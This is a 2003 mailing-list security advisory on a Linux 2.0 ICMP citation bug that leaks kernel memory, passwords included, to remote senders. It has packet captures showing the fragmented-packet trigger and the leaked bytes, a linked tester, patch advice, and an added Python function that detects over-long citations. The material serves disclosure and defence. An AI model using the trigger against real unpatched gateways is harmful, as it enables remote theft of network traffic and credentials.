Message-ID: <Pine.LNX.4.44.0306090851320.19133-100000@deneb.intranet.cartel-securite.net>
Date: Mon, 9 Jun 2003 08:56:55 +0200 (CEST)
From: Philippe Biondi <biondi@...tel-securite.fr>
To: vuln-dev@...urityfocus.com, <full-disclosure@...ts.netsys.com>,
   <bugtraq@...urityfocus.com>
Subject: Linux 2.0 remote info leak from too big icmp citation


----------------------------------------------------------------------
               Cartel Sécurité --- Security Advisory

Advisory Number: CARTSA-20030314
Subject:         Linux 2.0 remote info leak from too big icmp citation
Author:          Philippe Biondi <biondi@...tel-securite.fr>
Discovered:      March 14, 2003
Published:       June 9, 2003
CERT reference:  VU#471084 (http://www.kb.cert.org/vuls/id/471084)
----------------------------------------------------------------------

You can use this URL to link to this document:
http://www.cartel-securite.fr/pbiondi/adv/CARTSA-20030314-icmpleak.txt


Problem description
===================

There is a bug in the way the Linux 2.0 kernel IP stack computes the size of
the ICMP citation for almost every ICMP error. This leads to too much data
being sent on the network, coming from anywhere in memory.

This is a very important leak. Experiments show that even passwords can
be stolen. Moreover, you can do this from anywhere on the Internet, as long
as you can send IP packets to the vulnerable host (unless special firewalling
is in place).

The typical case is when you use a Linux 2.0 box (or, more probably,
any appliance that uses it) as a masquerading gateway for the Internet and
a DMZ. In this configuration, the gateway can be used to leak potentially
all the traffic from your LAN, even your POP passwords for
the mail server in the DMZ.


Vulnerable products
===================

Any Linux 2.0 kernel up to and including 2.0.39
Watchguard Firebox II

Any appliance (firewall, proxy, etc.) that uses Linux 2.0 <= 2.0.39


A tester can be found here (no guarantee though) :
http://www.cartel-securite.fr/pbiondi/python/icmpleaktest.py

Vulnerable:
# ./icmpleaktest.py  192.168.11.2
Packet sent. Answer should take 31s. Interrupt with C-c
Got '\x95\x03\x1a\x10Ji\xfb\xba\xd0\xc5Q\x14\x877\xbd\x8a;\xb3^\x7f'

Not vulnerable:
# ./icmpleaktest.py  172.16.1.40
Packet sent. Answer should take 31s. Interrupt with C-c
Got ''


Vendor status
=============

Linux 2.0.40 should be out soon.
Watchguard said updated releases will follow.

These vendors said they are not vulnerable :
* Netscreen
* Symantec
* Novell
* Clavister
* Ingrian
* StoneSoft
* Sun


Solutions
=========

* patch at http://www.cartel-securite.fr/pbiondi/patches/icmpleak.patch
  (No guarantee)
* replace your old appliance with a brand new Linux 2.4/netfilter one


Workarounds
===========

No good workarounds. But you can at least carefully try these:
* truncate ICMP errors at the RFC limit,
* filter out ICMP errors


Example
=======

We can send an IP packet with the MF flag :

15:41:05  192.168.0.12.80 > 192.168.0.10.80:  udp 4 (frag 52007:12@0+)
0x0000   4500 0020 cb27 2000 4011 0e3f c0a8 000c        E....'..@.......
0x0010   c0a8 000a 0050 0050 000c cd1e 5858 5858        .....P.P....XXXX

We wait 30s for the reassembly to time out:

15:41:35  192.168.0.10 > 192.168.0.12: icmp: ip reassembly time exceeded [tos 0xc0]
0x0000   45c0 0050 dcca 0000 4001 1bbc c0a8 000a        E..P....@.......
0x0010   c0a8 000c 0b01 aa24 0000 0000 4500 0020        .......$....E...
0x0020   cb27 2000 4011 0e3f c0a8 000c c0a8 000a        .'..@...........
0x0030   0050 0050 000c cd1e 5858 5858                  .P.P....XXXX
                                       0050 0050                    .P.P
0x0040   000c cd1e 5858 5858 207b 2d68 0000 0000        ....XXXX.{-h....


Bytes at offsets 0x3c to 0x4f are bonus.
It works with every ICMP error except the port unreachable error.
It is possible to increase the size of data leaked by adding IP options.
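
A detection check for the over-long citation described above, as an added example (not part of the advisory and not the author's tester). The function names are assumptions; the packet bytes are the reassembly-timeout reply from the capture in this section. It flags any ICMP error whose quoted data runs past the total length declared in the quoted IP header.

```python
import struct

ICMP_ERROR_TYPES = {3, 4, 5, 11, 12}  # RFC 792 messages that quote a datagram

# "ip reassembly time exceeded" reply copied from the capture above (80 bytes).
ADVISORY_REPLY = bytes.fromhex(
    "45c00050dcca000040011bbcc0a8000a" "c0a8000c0b01aa240000000045000020"
    "cb27200040110e3fc0a8000cc0a8000a" "00500050000ccd1e5858585800500050"
    "000ccd1e58585858207b2d6800000000"
)


def ipv4_lengths(buf):
    """Return (header_len, total_len) of an IPv4 header, or None if malformed."""
    if len(buf) < 20 or buf[0] >> 4 != 4:
        return None
    hlen = (buf[0] & 0x0F) * 4
    total = struct.unpack_from("!H", buf, 2)[0]
    if hlen < 20 or len(buf) < hlen or total < hlen:
        return None
    return hlen, total


def inspect_icmp_citation(packet):
    """Describe the citation in an IPv4 ICMP error; None for anything else."""
    outer = ipv4_lengths(packet)
    if outer is None or packet[9] != 1:          # protocol 1 = ICMP
        return None
    hlen, total = outer
    icmp = packet[hlen:min(total, len(packet))]  # ignore link-layer padding
    if len(icmp) < 8 or icmp[0] not in ICMP_ERROR_TYPES:
        return None
    cited = icmp[8:]                             # skip the 8-byte ICMP header
    inner = ipv4_lengths(cited)
    if inner is None:
        return None
    inner_hlen, inner_total = inner
    excess = cited[inner_total:]                 # bytes past the original datagram
    return {
        "cited_len": len(cited),
        "original_len": inner_total,
        "rfc792_len": inner_hlen + 8,            # header + 64 bits of data
        "excess_offset": hlen + 8 + inner_total if excess else None,
        "excess": excess,
    }
```

A non-empty `excess` on traffic leaving a gateway is the signature of this leak; `rfc792_len` is the length at which a filtering device would cut the citation when truncating ICMP errors.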


Examples of bonus bytes :



----------------------------------------------------------------------
Copyright (c) Cartel Sécurité
This document is copyrighted. It can't be edited nor republished
without explicit consent of Cartel Sécurité.
For more information, feel free to contact us.
http://www.cartel-securite.fr/
----------------------------------------------------------------------

-- 
Philippe Biondi <biondi@ cartel-securite.fr> Cartel Sécurité
Security Consultant/R&D                      http://www.cartel-securite.fr
Phone: +33 1 44 06 97 94                     Fax: +33 1 44 06 97 99
PGP KeyID:3D9A43E2  FingerPrint:C40A772533730E39330DC0985EE8FF5F3D9A43E2

